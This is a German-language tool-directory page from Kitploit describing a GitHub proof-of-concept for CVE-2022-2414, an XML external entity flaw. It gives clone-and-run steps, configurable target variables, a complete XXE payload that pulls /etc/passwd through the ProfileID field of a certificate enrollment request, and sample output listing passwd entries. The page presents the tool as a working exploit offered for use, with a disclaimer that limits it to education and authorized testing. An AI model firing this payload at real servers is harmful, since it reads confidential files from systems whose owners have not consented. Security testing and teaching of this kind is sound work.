Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-2414 — ist ein PoC-Skript, das die Ausnutzung einer XML-External-Entity-Sicherheitslücke (XXE) demonstriert. | Kitploit
Tools/GitHubGitHub/geniuszly/cve-2022-2414
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubgeniuszly/cve-2022-2414

CVE-2022-2414

ist ein PoC-Skript, das die Ausnutzung einer XML-External-Entity-Sicherheitslücke (XXE) demonstriert.

Repository anzeigen
3vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

EN

GenXMLExternalEntityExploit ist ein PoC-Skript zur Demonstration der Ausnutzung einer XML-External-Entity-Schwachstelle (XXE). Das Skript verwendet XML-Payloads, um vertrauliche Dateien von einem Zielserver auszulesen. Es kann für Sicherheitstests, Penetrationstests oder zu Bildungszwecken verwendet werden.

Funktionen

  • Sendet einen maßgeschneiderten XML-Payload an einen bestimmten Server.
  • Nutzt XXE-Schwachstellen aus, um Serverdateien auszulesen.
  • Einfach anpassbare Ziel-URL und Payload-Daten.

Verwendung

  1. Repository klonen
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2022-2414
    
  2. In das Verzeichnis wechseln
    root@kitploit:~
    cd CVE-2022-2414
    
  3. Skript ausführen Stellen Sie sicher, dass Python auf Ihrem System installiert ist.
    root@kitploit:~
    python3 GenXMLExternalEntityExploit.py
    

Konfiguration

  • TARGET_URL: Aktualisieren Sie die Variable TARGET_URL im Skript, um auf den zu testenden Zielserver zu verweisen.
  • XML_PAYLOAD: Passen Sie die Zeichenfolge XML_PAYLOAD im Skript für bestimmte Dateipfade oder serverseitige Operationen an.
  • HEADERS: Ändern Sie bei Bedarf die HTTP-Header.

Beispiel

Standardmäßig verwendet das Skript den folgenden Payload, um die Datei /etc/passwd auszulesen:

root@kitploit:~
<!--?xml version="1.0" ?-->
<!DOCTYPE xmlData [<!ENTITY fetchFile SYSTEM "file:///etc/passwd"> ]>
<CertEnrollmentRequest>
  <Attributes/>
  <ProfileID>&fetchFile;</ProfileID>
</CertEnrollmentRequest>

Beispielausgabe

root@kitploit:~
Инициализация отправки XML-пейлоада на сервер...
Статус-код ответа: 200
Содержимое XML-ответа:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nологin
...

Haftungsausschluss

Dieses Tool ist ausschließlich für Bildungszwecke und autorisierte Sicherheitstests gedacht. Der Autor übernimmt keine Verantwortung für eine unrechtmäßige Nutzung dieses Tools.

Tool herunterladen